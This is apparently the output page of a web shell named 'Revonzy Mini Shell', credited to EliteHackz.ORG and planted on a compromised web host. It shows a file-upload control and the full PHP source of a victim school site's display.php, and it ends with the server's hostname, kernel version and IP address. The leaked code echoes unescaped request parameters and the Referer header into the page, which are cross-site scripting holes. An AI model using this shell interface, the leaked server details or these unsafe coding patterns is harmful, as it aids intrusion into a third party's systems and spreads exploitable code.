Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/display.php

<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();

	// $staff_details	=	$db->get_teaching_staff();
	
	$chapter    =   0;
	
	if(isset($_GET['chapter']))
	{
	    $chapter    =   $_GET['chapter'];
	}
?>
<!DOCTYPE HTML>
<html>
<head>
<title></title>
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />


<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
<script src="js/jquery-1.7.min.js"></script>
<script src="js/jquery.easing.1.3.js"></script>
<script src="js/tms-0.4.1.js"></script>
   
<style>
.zoomin img 
{ 
margin-left:240px;
 height: 200px; width: 200px;
 -webkit-transition: all 2s ease; -moz-transition: all 2s ease;
 -ms-transition: all 2s ease; 
 transition: all 2s ease;
 }
.zoomin img:hover {
 width: 300px;
 height: 300px;
 }
 @-webkit-keyframes swinging{
    0%{-webkit-transform: rotate(10deg);}
    50%{-webkit-transform: rotate(-5deg)}
    100%{-webkit-transform: rotate(10deg);}
}
 
@keyframes swinging{
    0%{transform: rotate(10deg);}
    50%{transform: rotate(-5deg)}
    100%{transform: rotate(10deg);}
}
 
.swingimage{
    -webkit-transform-origin: 50% 0;
    transform-origin: 50% 0;
    -webkit-animation: swinging 3.5s ease-in-out forwards infinite;
    animation: swinging 3.5s ease-in-out forwards infinite;
}
.element {
  height:200px;
  width: 200px;
  margin: 0 auto;
 
  animation-name: stretch;
  animation-duration: 1.5s; 
  animation-timing-function: ease-out; 
  animation-delay: 0;
  animation-direction: alternate;
  animation-iteration-count: infinite;
  animation-fill-mode: none;
  animation-play-state: running;
}

@keyframes stretch {
  0% {
    transform: scale(.3);
    
    border-radius: 100%;
  }
  5% {
    
  }
  20% {
    transform: scale(1.5);
    
  }
}
</style>

</head>
<body>
	<?php
		require_once("lib/header.php");
	?>
	
	<style>
	#slideshow {
  margin: 80px auto;
  position: relative;
  width: 1080px;
  height: 440px;
  padding: 10px;
  box-shadow: 0 0 20px rgba(0, 0, 0, 0.4);
  margin:auto;
  z-index:0;
}

#slideshow > div {
  position: absolute;
  top: 10px;
  left: 10px;
  right: 10px;
  bottom: 10px;
  z-index:0;
}
.img_slide_n
{
	width:1080px;
	z-index:0;
}
.img_slide_n img{
	width:1080px;
	height:100%;
	z-index:0;
}
</style>
<script>
$("#slideshow > div:gt(0)").hide();

setInterval(function() {
  $('#slideshow > div:first')
    .fadeOut(1000)
    .next()
    .fadeIn(1000)
    .end()
    .appendTo('#slideshow');
}, 3000)
</script>

<div class="main_container" style="min-height:1400px;background-color:white;">

			<div class="data_container" style="margin-top:16px; width:auto;">
			    
			<style>
	    th
	    {
	        color:#FFFFFF;
	        text-align:center;
	    }
	    .mn_pg_title
	    {
	        color:#0070C0;
	        font-weight:bold;
	    }
	    td
	    {
	        text-align:left !important;
	        font-size:14px;
	        color:#333333;
	    }
	    .disps
	    {
	        display:none;
	        width:480px;
	        margin-top:15px;
	        background-color:#FAFAFA;
	        padding:15px;
	    }
	    ul .a{
  list-style-type: circle;
}
.links_p
{
    color:#333333;
    font-weight:bold;
    line-height:23px;
    margin-left:20px;
}
.links_p:hover
{
    text-decoration:underline;
}
.lnk_view
{
    font-family:Cambria;
    font-size:15px;
    color:#0070C0;
}
	</style>
	    
	<style>
	    th
	    {
	        color:#FFFFFF;
	        text-align:center;
	    }
	    .mn_pg_title
	    {
	        color:#0070C0;
	        font-weight:bold;
	    }
	    td
	    {
	        text-align:left !important;
	        font-size:14px;
	        color:#333333;
	    }
	</style>
	    <?php
            $cht    =   0;
            $table  =   0;
        
        if(isset($_GET['cht']))
        {
            $cht    =   $_GET['cht'];
        }
        if(isset($_GET['table']))
        {
	        $table  =   $_GET['table'];
        }
        
        $id			=	"";
        $serial_no	=	"";
        $title		=	"";
        $cfile		=	"";
        $date		=	"";
        $time		=	"";

        $data = array();
        $data = $db->get_added_data_for_criterion($cht,$table);

	    ?>
	<a href="<?php echo $_SERVER['HTTP_REFERER']; ?>"><< Back</a>
		<h4 class="mn_pg_title" style="text-align:center; margin-left:180px;"><?php echo $cht; ?></h4>
    	
    	<br />
    	
        <table class="table table-bordered" style="margin:auto; margin-left:180px;">
        <thead style="background-color:#0070C0">
          <tr>
            <th width="50">Sr. No.</th>
            <th width="500">Title</th>
            <th width="70">Link</th>
          </tr>
        </thead>
        <tbody>
            
	<?php
        if(!empty($data))
        {
            $counter = 1;
            
            foreach($data as $record)
            {
                $id			=	$record[0];
                $table		=	$record[1];
                $serial_no	=	$record[2];
                $title		=	$record[3];
                $cfile		=	$record[4];
                $date		=	$record[5];
                $time		=	$record[6];
    ?>
        <tr>
    	    <td style="text-align:center !important;"><?php echo $counter; ?></td>
    	    <td><?php echo $title; ?></td>
        	<td style="text-align:center !important;">
        	    <a href="admin/images/<?php echo $cfile; ?>">View</a>
        	</td>
        </tr>
    <?php
                $counter++;
            }
        }
        else 
        {
    ?>
        <tr>
    	    <td colspan="3">No data found</td>
        </tr>
    <?php
        }
	?>
	
	</tbody>
  </table>

</div>
		
	<?php
		require_once("lib/footer.php");
	?>
	    </body>
</html>

    	
    	

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4